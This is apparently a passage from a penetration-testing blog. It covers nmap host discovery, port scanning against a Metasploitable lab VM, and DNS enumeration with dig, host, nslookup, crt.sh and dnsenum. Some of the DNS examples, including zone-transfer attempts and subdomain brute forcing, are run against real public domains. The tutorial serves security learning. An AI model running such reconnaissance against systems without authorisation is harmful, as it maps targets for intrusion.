    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0047s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.00098s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0016s latency).
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    Nmap scan report for 192.168.186.254
    Host is up (0.00078s latency).
    MAC Address: 00:50:56:EA:7A:B5 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (7 hosts up) scanned in 2.02 seconds

    You’ll notice that I added R to the -P option, explicitly requesting ARP pings. Contrast that with -Pn, which skips host discovery entirely and assumes every address is up; running the same scan with it instead results in a mess:

    $ sudo nmap -sn -Pn 192.168.186.80-85
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 15:03 PDT
    Nmap scan report for 192.168.186.80
    Host is up.
    Nmap scan report for 192.168.186.81
    Host is up.
    Nmap scan report for 192.168.186.82
    Host is up.
    Nmap scan report for 192.168.186.83
    Host is up.
    Nmap scan report for 192.168.186.84
    Host is up.
    Nmap scan report for 192.168.186.85
    Host is up.
    Nmap done: 6 IP addresses (6 hosts up) scanned in 0.01 seconds

    Here, I purposefully chose a range I knew didn’t have any connected hosts, yet nmap still said they were up…

    Using the R option felt like a cheat, so you might be better off using a dedicated tool like arp-scan for ARP scanning.
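
    For example, arp-scan can sweep the local subnet in one go (assuming it’s installed):

    $ sudo arp-scan --localnet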

    Ping Scanning

    Higher up on the protocol stack is ping probing using the ICMP protocol. When most people think of pinging, they think of using the ping command to send ICMP echo requests.

    nmap can use ICMP echo requests, as well as other methods of the protocol using the -P switch:

    • -PE: echo request
    • -PP: timestamp query
    • -PM: address mask query

    If a host replies, it’s online. I scanned my network using the --disable-arp-ping flag to tell nmap only to do ping scanning:

    $ sudo nmap -sn -PE --disable-arp-ping 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 14:43 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0023s latency).
    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0011s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0031s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0019s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (6 hosts up) scanned in 4.86 seconds

    In this example, I chose ICMP echo requests to scan the network. As expected, this scan took a little longer than the ARP scan in the previous example. Remember to consider the network context when performing scans. Since I’m on a local network, an ARP scan is preferable because it gets results faster and more reliably.

    That being said, it’s important to try different protocols as systems are configured to respond differently:

    $ sudo nmap -sn -PP --disable-arp-ping 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 14:42 PDT
    Nmap scan report for 192.168.186.71
    Host is up (0.0038s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0015s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0016s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 9.63 seconds

    In this example I told nmap to do a timestamp query scan and it took considerably longer. My VMware gateway was also configured not to respond to timestamp queries, so it did not show up in the results.

    Always mix and match protocol types. Some systems might be online but are configured not to respond to echo requests. So, you might find something that was missed in a previous scan by running nmap with different options.

    TCP/UDP/SCTP Scanning

    We’re taking another step up the protocol stack with TCP/UDP/SCTP scanning. In this type of scan, we use one of these protocols to probe a single port. While this has the highest overhead (and will be slower), it has the advantage of being able to scan a host over the internet.

    As with the previous scans, we’re going to again use the -P option:

    • -PY: SCTP INIT
    • -PS: TCP SYN
    • -PA: TCP ACK
    • -PU: UDP

    Let’s try a SYN ping scan:

    $ sudo nmap -sn --disable-arp-ping -PS 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 15:04 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0020s latency).
    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0060s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0018s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 4.88 seconds

    nmap chooses ports to probe by default but you can specify them by putting a number or range next to the scan type:

    $ sudo nmap -sn --disable-arp-ping -PU53 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 15:06 PDT
    Nmap scan report for 192.168.186.72
    Host is up (0.0018s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0017s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 9.61 seconds

    I chose port 53 (DNS) to perform my UDP scan because it’s super common. As you can see, I got fewer results with this and it took a lot longer. Again, it’s important to try different ports and protocols with these scans. For example, if I knew an organization had websites up and running, I might try ports 80 and 443 to see what servers they have online. If I’m scanning a business network with a lot of users, they may be using AD to manage their systems, so I might try port 389 or 636 for LDAP.

    Context matters!

    Port Scanning

    Now that we know what hosts are up and running, we can check what services are running on these hosts. Open ports present an opportunity for access, so it’s important to know what can be potentially accessed or exploited.

    We saw that nmap scans ports by default using full TCP connections, or just by using TCP SYN packets when running as root.

    To specify a scan option, we can use the -s argument with nine different options. We’ll only go over a few but I’ll list some common scans:

    • -sS: SYN scan (default when running as root)
    • -sT: TCP connect scan (default without root)
    • -sU: UDP scan
    • -sY: SCTP INIT scan

    This sort of syntax should be familiar to you as it is very similar to the various ping scan options with -P. I used a SYN scan to scan my metasploitable machine:

    $ sudo nmap -sS ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 21:16 PDT
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0029s latency).
    Not shown: 977 closed tcp ports (reset)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    53/tcp   open  domain
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    5432/tcp open  postgresql
    5900/tcp open  vnc
    6000/tcp open  X11
    6667/tcp open  irc
    8009/tcp open  ajp13
    8180/tcp open  unknown
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds

    nmap was able to find quite a few open ports. I like the SYN scan because it offers the reliability of a TCP scan without being as slow (this scan took only 0.38 seconds), since it never completes the full connection.

    That being said, it’s important to try other scan types:

    $ sudo nmap -sU -p 53,1000-1010 ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 21:20 PDT
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0018s latency).
    
    PORT     STATE         SERVICE
    53/udp   open          domain
    1000/udp closed        ock
    1001/udp open|filtered unknown
    1002/udp closed        unknown
    1003/udp closed        unknown
    1004/udp closed        unknown
    1005/udp open|filtered unknown
    1006/udp closed        unknown
    1007/udp closed        unknown
    1008/udp open|filtered ufsd
    1009/udp closed        unknown
    1010/udp closed        surf
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 4.87 seconds

    This time, I told nmap to do a UDP scan. You’ll also notice that I specified which ports to scan using the -p option. You can tell nmap to scan a range, comma-separated values, ports specified by name, or every port using -p-; see the sketches below.
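
    A few example port specifications (sketches against my ms2 host):

    $ sudo nmap -p 22,80,443 ms2   # comma-separated list
    $ sudo nmap -p 1-1024 ms2      # range
    $ sudo nmap -p smtp,http ms2   # by service name
    $ sudo nmap -p- ms2            # every TCP port (1-65535)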

    Even though I scanned only 11 ports, the UDP scan took a little longer than the SYN scan. Besides finding ports that were open or closed, nmap flagged some as open|filtered. This just means that nmap couldn’t tell whether the port was truly open or protected by some sort of firewall.

    Like I said when doing host discovery, it’s important to experiment with different scan methods. There are more than just the few types I listed, so feel free to check those out at nmap.org.

    Output

    As a penetration tester, it’s important to keep track of your scan results. Not only for you to go back over (instead of repeating scans), but for reporting purposes as well.

    nmap makes this a snap with its -o family of output options. There are a few variants:

    • -oN: normal output
    • -oX: XML output
    • -oG: grepable output
    • -oA: output in all formats

    I usually stick with outputting my scan results in every format because they’re all useful in their own ways. I like normal output for reading over myself. Grepable output is great because it puts each host on a single line which makes it easier to grep by host (hence the name). Finally, XML output is extremely useful for web-based visualization tools or storing the results in a database. For example, I love feeding my XML scan results to metasploit, which makes it really easy to organize and search through my results.
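
    As a quick illustration of that last workflow, here’s a sketch of importing results into Metasploit (assuming a scan saved with -oA and a connected Metasploit database):

    $ sudo nmap -sS -oA msnet 192.168.186.0/24
    $ msfconsole
    msf6 > db_import msnet.xml
    msf6 > hosts
    msf6 > services

    After the import, the hosts and services commands let you slice through the results without ever re-running the scan.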

    Conclusion

    If you made it this far, you can now add an invaluable tool to your hacking arsenal. This was a lengthy post, so give yourself a huge pat on the back for reading it all. Your learning is not over yet, though. To really make this stick, download nmap and play around on your own network. It’s fun and a great way to make sure you retain what you learned. Otherwise (in my own experience) the knowledge won’t stick!

  • DNS Enumeration

    DNS Enumeration

    Now, the fun begins. If you followed my last post about the basics of DNS, you should be armed and ready to tackle the subject of this post: DNS enumeration.

    DNS enumeration is the process of obtaining as much information about a target as possible by pulling from publicly available DNS records. This can expand the attack surface of a target by revealing their internet facing servers, email addresses, and more depending on how extensively you enumerate.

    The key word in this definition is “publicly”. That means you can try all of the methods in the next section on your own (and I encourage you to do so).

    However, it’s important to note that some automated scripts brute-force subdomains by default, which may overload older servers. This is unlikely, but make sure you know what a tool is going to do before you fire it off.

    With that being said, let’s get into enumerating DNS!

    Manual Techniques

    There are several scripts out there that allow you to automatically scrape tons of DNS information in a point and click fashion. However, it’s important to know how to manually enumerate DNS in order to modularize enumeration and adapt it to more specific situations.

    Don’t let the term “manual” scare you though. I’m going to go over a few tools that will make this process a snap.

    Whois

    Using the Whois service is a great starting point in your quest for information. With just the domain name of a target’s website, you can pull its registrar information, the geographic location of its servers, the name servers associated with it, and contact information for system admins and technical support.

    The whois command is built into most UNIX-based operating systems. So, if you’re running one of its variants, like a Linux distro or macOS, you can run:

    whois <domain name>

    You’ll quickly be overwhelmed with a bunch of information about that domain name. For this reason, I recommend using an online tool like https://www.whois.com/whois. They organize data a bit more graphically than the plain terminal-based whois command does.

    DiG

    If there’s one manual tool you need to know, it’s the dig command. Like whois, it comes prepackaged with many UNIX variants. Unlike whois, it’s much more powerful.

    To use dig, follow this format:

    dig @<name server> <domain name> <record type>

    The name server and record type positional arguments are optional. You can use dig in the same way as you would whois:

    [~]$ dig github.com
    
    ; <<>> DiG 9.16.1-Ubuntu <<>> github.com
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4266
    ;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
    
    ;; QUESTION SECTION:
    ;github.com.                    IN      A
    
    ;; ANSWER SECTION:
    github.com.             60      IN      A       192.30.255.113
    
    ;; Query time: 115 msec
    ;; SERVER: 8.8.8.8#53(8.8.8.8)
    ;; WHEN: Tue Feb 28 19:17:22 PST 2023
    ;; MSG SIZE  rcvd: 44

    By default, dig pulls A records and uses whatever nameserver it can access from my /etc/resolv.conf file. As you can see, it decided to use Google’s nameserver at 8.8.8.8.

    Of course, dig can be used for so much more. Let’s try pulling the nameservers of github.com:

    [~]$ dig github.com NS +short
    dns1.p08.nsone.net.
    dns2.p08.nsone.net.
    dns3.p08.nsone.net.
    dns4.p08.nsone.net.
    ns-1283.awsdns-32.org.
    ns-1707.awsdns-21.co.uk.
    ns-421.awsdns-52.com.
    ns-520.awsdns-01.net.

    In this example, I told dig to grab me the NS records associated with github.com and keep the output short and sweet with the +short query modifier. I like to use +short with dig because the output can be pretty cluttered.

    Another useful query type is the ANY query, which pulls all available records associated with a domain:

    [~]$ dig github.com ANY +noall +answer
    github.com.             60      IN      A       192.30.255.113
    github.com.             900     IN      NS      dns1.p08.nsone.net.
    github.com.             900     IN      NS      dns2.p08.nsone.net.
    github.com.             900     IN      NS      dns3.p08.nsone.net.
    github.com.             900     IN      NS      dns4.p08.nsone.net.
    github.com.             900     IN      NS      ns-1283.awsdns-32.org.
    github.com.             900     IN      NS      ns-1707.awsdns-21.co.uk.
    github.com.             900     IN      NS      ns-421.awsdns-52.com.
    github.com.             900     IN      NS      ns-520.awsdns-01.net.
    github.com.             900     IN      SOA     ns-1707.awsdns-21.co.uk. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
    github.com.             3600    IN      MX      1 aspmx.l.google.com.
    github.com.             3600    IN      MX      10 alt3.aspmx.l.google.com.
    github.com.             3600    IN      MX      10 alt4.aspmx.l.google.com.
    github.com.             3600    IN      MX      5 alt1.aspmx.l.google.com.
    github.com.             3600    IN      MX      5 alt2.aspmx.l.google.com.
    ...

    As you can see, dig was able to pull a variety of records, including SOA and MX. I also used the +noall combined with +answer query modifiers to single out the responses in the output. This is useful if you just want to see the results of a query (no annoying header messages) but want a little more info than what’s provided with +short.

    Additionally, dig can initiate zone transfers. A zone transfer is the process DNS servers use to copy the records of a particular zone to another server. It exists primarily for redundancy: if one server goes down, another server holding copies of all the records can resume operation in its place.

    Misconfigured servers allow zone transfers to anyone who requests one (including you). This can potentially leak private records.

    With dig it’s as simple as:

    [~]$ dig @dns3.p08.nsone.net github.com AXFR +noall +answer
    ; Transfer failed.

I used the AXFR query type to initiate a zone transfer with one of github.com's nameservers. It didn't let me. Good job, GitHub.

This is usually the case, as zone transfers are a well-known vulnerability. However, never rule them out. Companies usually run multiple nameservers for redundancy, and in some cases the secondary servers get overlooked during hardening. So, try zone transfers against all of a target's nameservers; you might get lucky.
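A quick loop makes this painless. Here's a minimal sketch (with example.com standing in for your target) that feeds every NS record dig finds back into an AXFR attempt:

    [~]$ for ns in $(dig example.com NS +short); do dig @$ns example.com AXFR +noall +answer; done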

    Host

Another tool worth mentioning, very similar to dig and bundled with most UNIX-based OSes, is host. Keep in mind that Windows doesn't ship a host command by default; nslookup (covered below) is the closest built-in equivalent there.

    Just typing host and supplying it a domain name can reveal some useful information:

    [~]$ host reddit.com
    reddit.com has address 151.101.129.140
    reddit.com has address 151.101.193.140
    reddit.com has address 151.101.1.140
    reddit.com has address 151.101.65.140
    reddit.com has IPv6 address 2a04:4e42::396
    reddit.com has IPv6 address 2a04:4e42:600::396
    reddit.com has IPv6 address 2a04:4e42:400::396
    reddit.com has IPv6 address 2a04:4e42:200::396
    reddit.com mail is handled by 5 alt2.aspmx.l.google.com.
    reddit.com mail is handled by 1 aspmx.l.google.com.
    reddit.com mail is handled by 10 aspmx2.googlemail.com.
    reddit.com mail is handled by 10 aspmx3.googlemail.com.
    reddit.com mail is handled by 5 alt1.aspmx.l.google.com.

With just one argument, host was able to pull reddit.com's A, AAAA, and MX records in an arguably cleaner fashion than dig.
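If you only want a specific record type, host accepts the -t flag. For example, to pull just the NS records:

    [~]$ host -t ns reddit.com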

A useful flag I like using when running host is -a:

    [~]$ host -a reddit.com
    Trying "reddit.com"
    Trying "reddit.com"
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12601
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 34, AUTHORITY: 0, ADDITIONAL: 0
    
    ;; QUESTION SECTION:
    ;reddit.com.                    IN      ANY
    
    ;; ANSWER SECTION:
    reddit.com.             278     IN      A       151.101.193.140
    reddit.com.             278     IN      A       151.101.129.140
    reddit.com.             278     IN      A       151.101.65.140
    reddit.com.             278     IN      A       151.101.1.140
    reddit.com.             86378   IN      NS      ns-557.awsdns-05.net.
    reddit.com.             86378   IN      NS      ns-1029.awsdns-00.org.
    reddit.com.             86378   IN      NS      ns-1887.awsdns-43.co.uk.
    reddit.com.             86378   IN      NS      ns-378.awsdns-47.com.
    reddit.com.             878     IN      SOA     ns-557.awsdns-05.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
    reddit.com.             278     IN      MX      5 alt2.aspmx.l.google.com.
    reddit.com.             278     IN      MX      1 aspmx.l.google.com.
    reddit.com.             278     IN      MX      10 aspmx2.googlemail.com.
    reddit.com.             278     IN      MX      10 aspmx3.googlemail.com.
    reddit.com.             278     IN      MX      5 alt1.aspmx.l.google.com.
    reddit.com.             3578    IN      TXT     "google-site-verification=zZHozYbAJmSLOMG4OjQFoHiVqkxtdgvyBzsE7wUGFiw"
    reddit.com.             3578    IN      TXT     "logmein-verification-code=1e307fc8-361a-4e39-8012-ed0873b06668"
    reddit.com.             3578    IN      TXT     "onetrust-domain-verification=6b98ba3dd087405399bbf45b6cbdcd37"
    reddit.com.             3578    IN      TXT     "stripe-verification=9bd70dd1884421b47f596fea301e14838c9825cdba5b209990968fdc6f8010c7"
    reddit.com.             3578    IN      TXT     "twilio-domain-verification=5e37855d7c9445e967b31c5e0371ebb5"
    reddit.com.             3578    IN      TXT     "v=spf1 include:amazonses.com include:_spf.google.com include:mailgun.org include:19922862.spf01.hubspotemail.net ip4:174.129.203.189 ip4:52.205.61.79 ip4:54.172.97.247 ~all"
    reddit.com.             3578    IN      TXT     "614ac4be-8664-4cea-8e29-f84d08ad875c"
    reddit.com.             3578    IN      TXT     "MS=ms71041902"
    reddit.com.             3578    IN      TXT     "apple-domain-verification=qC3rSSKrh10DoMI7"
    reddit.com.             3578    IN      TXT     "atlassian-domain-verification=aGWDxGvt+oY3p7qTWt5v2uJDVJkoJAeHxwGqKmGQLMEsUXUJJe/Pm/k+GGNPpn6M"
    reddit.com.             3578    IN      TXT     "atlassian-domain-verification=vBaV6PXyyu4OAPLiQFbxFMCboSTjoR/qxKJ2OlpI46ZEpZL/FVTIfMlgoM5Hy9eY"
    reddit.com.             3578    IN      TXT     "box-domain-verification=95c33f4ee4b11d8827190dbc5371ca7df25b961019116e5565ce4aa36de9be3a"
    reddit.com.             3578    IN      TXT     "docusign=6ba0c5a9-5a5e-41f8-a7c8-8b4c6e35c10c"
    reddit.com.             3578    IN      TXT     "google-site-verification=0uv13-wxlHK8FFKaUpgzyrVmL1YdNYW6v3PupLdw3JI"
    reddit.com.             3578    IN      TXT     "google-site-verification=oh_YJE560y0e6FHP1RT7NIjyTlBhACNMvD2EgSss0sc"
    reddit.com.             278     IN      AAAA    2a04:4e42:200::396
    reddit.com.             278     IN      AAAA    2a04:4e42:400::396
    reddit.com.             278     IN      AAAA    2a04:4e42:600::396
    reddit.com.             278     IN      AAAA    2a04:4e42::396
    reddit.com.             86378   IN      CAA     0 issue "digicert.com; cansignhttpexchanges=yes"
    
    Received 1838 bytes from 10.220.0.1#53 in 15 ms

As you can see, an absolutely enormous amount of information was pulled. That's because -a tells host to run a verbose ANY query, pulling all of the records it can from its target.

    You can also perform zone transfers:

    [~]$ host -l reddit.com
    ;; Connection to 123.456.78.9#53(123.456.78.9) for reddit.com failed: connection refused.
    ;; Connection to 123.456.78.1#53(123.456.78.1) for reddit.com failed: connection refused.

And it seems the nameservers host contacted (123.456.78.9 and 123.456.78.1) refused our connections, so no zone transfer this time.
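host's -l also accepts a specific nameserver as a second argument, so you can try each of the zone's authoritative servers in turn. A sketch using one of the AWS nameservers from the -a output above (expect a refusal from a well-run zone like this one):

    [~]$ host -l reddit.com ns-557.awsdns-05.net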

    Nslookup

This tool functions fairly similarly to host and dig but has an optional interactive mode. This is useful for when you want to frequently change options such as query types and nameservers without retyping the name of the command all over again.

    Here’s a quick example:

    [~]$ nslookup
    > set type=NS
    > microsoft.com
    Server:         123.456.78.9
    Address:        123.456.78.9#53
    
    Non-authoritative answer:
    microsoft.com   nameserver = ns4-39.azure-dns.info.
    microsoft.com   nameserver = ns1-39.azure-dns.com.
    microsoft.com   nameserver = ns2-39.azure-dns.net.
    microsoft.com   nameserver = ns3-39.azure-dns.org.
    
    Authoritative answers can be found from:
    > server ns1-39.azure-dns.com
    Default server: ns1-39.azure-dns.com
    Address: 150.171.10.39#53
    Default server: ns1-39.azure-dns.com
    Address: 2603:1061:0:10::27#53
    > set type=MX
    > microsoft.com
    Server:         ns1-39.azure-dns.com
    Address:        150.171.10.39#53
    
    microsoft.com   mail exchanger = 10 microsoft-com.mail.protection.outlook.com.

To access interactive mode, I ran nslookup without any arguments. From there I set the query type to NS to look up microsoft.com's nameservers, then used one of their nameservers to look up their mail servers.

    As you can see, most of the commands I typed were only one or two words long. For this reason, I like nslookup for poking around if I’m not necessarily sure what I’m looking for and need to frequently update my commands.
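If you just need a one-off query, nslookup also works non-interactively. The same MX lookup from the session above as a single command:

    [~]$ nslookup -type=MX microsoft.com ns1-39.azure-dns.com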

    It’s important to note that these three tools (dig, host, nslookup) function very similarly. So, I encourage you to try all of them, use them interchangeably, and read the man pages for each one. They each have their strengths and weaknesses. The one you choose depends on your situation and preferences.

    Subdomain Enumeration

Subdomain enumeration is the process of finding as many subdomains associated with a domain as possible. It's an important part of DNS enumeration because it expands our attack surface even further. You can also apply the techniques described previously to the subdomains you find to make your enumeration even more effective.

    Most modern search engines can be a useful tool for subdomain enumeration. If you read one of my earlier posts about Google Dorking, you may already be familiar with the technique I’m about to describe.

Google makes subdomain enumeration a snap with the inurl: operator:

    iRobot’s subdomains provided by Google

Using inurl: with the domain name, irobot.com, I was able to find numerous subdomains. I also used -www to tell Google to exclude search results containing www.
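For reference, the query described above boils down to something like this (a rough reconstruction; swap in your own target, and keep in mind Google's operators change over time):

    inurl:irobot.com -www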

Another powerful tool for subdomain enumeration is crt.sh, the Certificate Search tool:

crt.sh results from the query %.irobot.com

The query I used to pull all of these results was %.irobot.com, where the % symbol is a wildcard. This means that any certificate issued for a name ending in “.irobot.com” will appear in the search results.
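At the time of writing, crt.sh can also return results as JSON, which makes it easy to script. A rough sketch using curl and jq (assuming both are installed, that the wildcard % is URL-encoded as %25, and that the name_value field still carries the matched names):

    [~]$ curl -s 'https://crt.sh/?q=%25.irobot.com&output=json' | jq -r '.[].name_value' | sort -u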

Combining these techniques is a powerful way to discover subdomains, giving you an edge by widening your view of the target.

    Automated Techniques

Now that you know some basic (but powerful) techniques for enumerating subdomains, it's time to automate the process.

There are tons of tools out there that perform all of these steps (and more) to provide you with as much information associated with a domain name as possible. One popular option is dnsenum. As described in its man page, dnsenum can perform:

    nslookup, zonetransfer, google scraping, domain brute force (support also recursion), whois ip and reverse lookups.

    Here’s what I was able to pull by pointing this tool at burgerking.com:

    [~]$ dnsenum burgerking.com
    dnsenum VERSION:1.2.6
    
    -----   burgerking.com   -----
    
    
    Host's addresses:
    __________________
    
    burgerking.com.                          37       IN    A        99.84.66.7
    burgerking.com.                          37       IN    A        99.84.66.86
    burgerking.com.                          37       IN    A        99.84.66.37
    burgerking.com.                          37       IN    A        99.84.66.51
    
    
    Name Servers:
    ______________
    
    udns1.cscdns.net.                        28800    IN    A        204.74.66.1
    udns2.cscdns.uk.                         13091    IN    A        204.74.111.1
    
    
    Mail (MX) Servers:
    ___________________
    
    ASPMX2.GOOGLEMAIL.com.                   293      IN    A        64.233.171.27
    ALT2.ASPMX.L.GOOGLE.com.                 293      IN    A        142.250.152.27
    ALT1.ASPMX.L.GOOGLE.com.                 293      IN    A        64.233.171.27
    ASPMX.L.GOOGLE.com.                      292      IN    A        142.250.141.26
    ASPMX3.GOOGLEMAIL.com.                   293      IN    A        142.250.152.27
    
    
    Trying Zone Transfers and getting Bind Versions:
    _________________________________________________
    
    
    Trying Zone Transfer for burgerking.com on udns1.cscdns.net ...
    AXFR record query failed: REFUSED
    
    Trying Zone Transfer for burgerking.com on udns2.cscdns.uk ...
    AXFR record query failed: REFUSED
    
    
    Brute forcing with /usr/share/dnsenum/dns.txt:
    _______________________________________________
    
    www.burgerking.com.                      86400    IN    CNAME    prod-bk-web.com.rbi.tools.
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.112
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.119
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.10
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.51

I cut the scan short, but you can see it pulled some useful servers (along with their IP addresses), found some domains, attempted zone transfers, and tried to determine the DNS servers' BIND versions.
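dnsenum also takes flags to tune a run. For instance, the version I'm using supports --noreverse to skip the reverse-lookup phase and -o to save results as XML (check man dnsenum to see what your build offers):

    [~]$ dnsenum --noreverse -o burgerking.xml burgerking.com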

Other great tools include fierce, dnsrecon, and sublist3r (the latter focused on subdomain enumeration). I encourage you to try them all out and see which ones work for you. There are also tons of open-source tools out there that I haven't mentioned that are worth trying as well!

    Now that you’ve seen a fantastic tool that formats everything you might need beautifully with color-coding, you may be asking yourself: “Why even bother with manual testing in the first place?”

While these tools are extremely efficient, they aren't a one-line solution for all of your needs. When enumerating, it's important to supplement your automated information gathering with manual gathering.

Manual enumeration is extremely flexible, allowing you to poke around at every angle you can think of and dig deeper than some automated scripts will. It's also worth noting that these automated scripts generate a ton of traffic. So, in a scenario where stealth is required, it may be more appropriate to test manually and fly under the radar.

    Conclusion

    DNS enumeration is a critical step in the process of analyzing your target. When executed correctly, it can be used to expose a wealth of information. The more information you have on a target, the more effective your penetration test will be.

I only covered the basics to give you a starting point. I highly encourage you to look at the manual pages (with the man command, arguably the best UNIX command) to learn the ins and outs of these tools so you can make the most of them. At the end of the day, these tools are simply lines of code; it's up to you to make them useful.

    Remember, this information is all public, so feel free to practice on your own (you definitely should) and see what you can dig up. Just be careful when using the brute-force tools against servers you don’t own (again read the man pages so you know what you’re doing) and don’t use any of the information you gather without permission.

    That’s all and happy hunting! In the next post, I’m going to be talking about scanning with nmap so stay tuned for that!
